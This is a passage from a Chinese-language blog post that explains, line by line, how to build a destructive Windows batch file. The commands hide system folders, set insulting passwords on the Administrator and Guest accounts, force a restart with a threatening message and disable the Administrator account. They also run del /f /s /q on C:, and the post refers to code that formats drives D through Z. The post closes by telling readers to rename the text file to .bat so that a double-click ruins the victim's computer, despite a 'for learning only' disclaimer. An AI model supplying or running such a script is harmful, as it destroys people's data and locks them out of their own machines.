    (仅供学习交流,否则后果自负) 上面这一段代码的意思是快速格式化D到Z盘的所有内容。没有则掠过 再回车输入 cd c:\attrib +s +h "windows"attrib +s +h "Program Files"attrib +s +h "Documents and Settings"这段代码是切换到C盘,并且隐藏C盘重要文件,将其设置为系统只读隐藏文件。然后回车输入cd C:\Documents and Settings\Administrator\桌面attrib +S +h上面是隐藏桌面继续回车输入代码net user administrator nisidinglenet user guest nihuile这段代码意思是将计算机的administrator(超级管理员)账户和Guest(来宾账户)设置密码,分别是“你死定了”和“你毁了”的汉语拼音接着回车输入shutdown -r -t 60 -c "敢惹老子!你死定了!"这段代码是设置1分钟关机的,并且会提示:敢惹老子!你死定了也可以把提示换成别的,只要在120个字之内最后回车输入net user administrator /active:no最后这段代码将直接禁用Administrator用户,别人将重启后将无法进入系统然后回车输入 del /f /s /q c:*.*这句命令是删除C盘所有能删除的文件,并且也删除了shutdown和net这两个DOS命令,使对方无法解除关机最后一步把txt文件改成bat文件,只要双击后,你的电脑基本就毁了...

    2023-03-01 279

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注